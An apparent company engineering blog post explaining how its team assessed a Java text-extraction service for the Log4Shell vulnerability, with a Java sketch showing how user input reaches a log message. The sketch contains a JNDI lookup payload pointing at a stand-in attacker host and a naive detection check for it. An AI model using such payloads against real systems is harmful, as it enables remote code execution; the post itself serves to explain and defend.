How we determined whether our software was susceptible to the Log4Shell vulnerability, crafted a demo exploit, and then resolved the issue.
By now, most readers will have heard of the recent zero-day remote code execution (RCE) vulnerability in the popular Apache Log4j library. First announced on Twitter on December 9, 2021, and later published as CVE-2021-44228, this vulnerability has kept teams busy patching their services for the past month.
At Borneo, we do not use much Java in our own software stack. So when checking how our software might be affected by this vulnerability, we could focus our attention on a single microservice. This service, called the Extraction service, uses the open-source Apache Tika library to extract plain text from various file formats such as PDFs and Office documents. Borneo needs this to detect sensitive information in such documents. Because Apache Tika is implemented in Java, the Extraction service was also implemented in Java, using the Spring Boot framework, and it uses the vulnerable Log4j 2 library for logging.
TL;DR: If a user of your application controls a string that at any point ends up in a message logged with a vulnerable version of Log4j, that user can instruct your application to load executable code from a remote server they control, and then execute that code!
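To make that data flow concrete, here is a minimal sketch in plain Java with no Log4j dependency. It shows how a user-controlled value ends up inside a log message, and how a lookup expression such as `${jndi:...}` would travel along with it. The class name, the method names, the idea that the controlled string is a file name, and the host `attacker.example` are all assumptions made for illustration; this is not code from our Extraction service.

```java
import java.util.Locale;

public class LogInjectionSketch {

    // Builds the kind of message a service might log for an incoming request.
    // With Log4j 2, the equivalent logging call would look roughly like:
    //   logger.info("Extracting text from file: {}", fileName);
    // Here we only build the string, so nothing is ever resolved or fetched.
    static String buildLogMessage(String fileName) {
        return "Extracting text from file: " + fileName;
    }

    // Naive check for the JNDI lookup prefix. This is for illustration only
    // and is NOT a mitigation: nested lookups can obfuscate the prefix.
    static boolean containsJndiLookup(String message) {
        return message.toLowerCase(Locale.ROOT).contains("${jndi:");
    }

    public static void main(String[] args) {
        String benign = "report.pdf";
        // Hypothetical attacker-supplied value pointing at a server they control.
        String malicious = "${jndi:ldap://attacker.example/a}";

        System.out.println(containsJndiLookup(buildLogMessage(benign)));    // false
        System.out.println(containsJndiLookup(buildLogMessage(malicious))); // true
    }
}
```

The point of the sketch is that the application does nothing unusual: it simply logs a value it received. On a vulnerable Log4j version, the library itself interprets the lookup expression while formatting the message.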